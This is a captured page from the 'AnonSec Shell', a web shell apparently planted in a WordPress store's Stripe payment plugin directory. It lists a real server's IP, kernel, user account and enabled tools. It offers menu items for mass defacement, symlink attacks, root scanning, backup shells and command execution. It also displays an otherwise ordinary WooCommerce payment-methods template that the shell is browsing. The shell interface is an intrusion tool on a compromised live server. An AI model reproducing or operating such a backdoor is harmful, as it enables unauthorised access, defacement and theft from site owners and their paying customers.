AnonSec Shell
Server IP : 144.76.79.100  /  Your IP : 216.73.216.103   [ Reverse IP ]
Web Server : Apache
System : Linux ch05.wehostwebserver.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User : razzlestore ( 1092)
PHP Version : 8.2.29
Disable Function : NONE
Domains : 343 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/razzlestore/public_html/wp-content/plugins/woo-stripe-payment/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/razzlestore/public_html/wp-content/plugins/woo-stripe-payment/templates/payment-methods.php
<?php
/**
 * @version 3.0.0
 */
?>
<input type="radio" class="wc-stripe-payment-type" checked="checked" id="<?php echo esc_attr( $gateway->id ) ?>_use_saved" name="<?php echo esc_attr( $gateway->payment_type_key ) ?>" value="saved"/>
<label for="<?php echo esc_attr( $gateway->id ) ?>_use_saved" class="wc-stripe-label-payment-type"><?php echo esc_html( $gateway->get_saved_methods_label() ) ?></label>
<div class="wc-stripe-saved-methods-container wc-<?php echo esc_attr( $gateway->id ) ?>-saved-methods-container">
    <select class="wc-stripe-saved-methods" id="<?php echo esc_attr( $gateway->saved_method_key ) ?>" name="<?php echo esc_attr( $gateway->saved_method_key ) ?>">
		<?php foreach ( $tokens as $token ): ?>
            <option class="wc-stripe-saved-method <?php echo esc_attr( $token->get_html_classes() ) ?>" value="<?php echo esc_attr( $token->get_token() ) ?>"
                    data-gateway="<?php echo esc_attr( $token->get_gateway_id() ) ?>"><?php echo esc_html( $token->get_payment_method_title( $gateway->get_option( 'method_format' ) ) ) ?></option>
		<?php endforeach; ?>
    </select>
</div>

Anon7 - 2022
AnonSec Team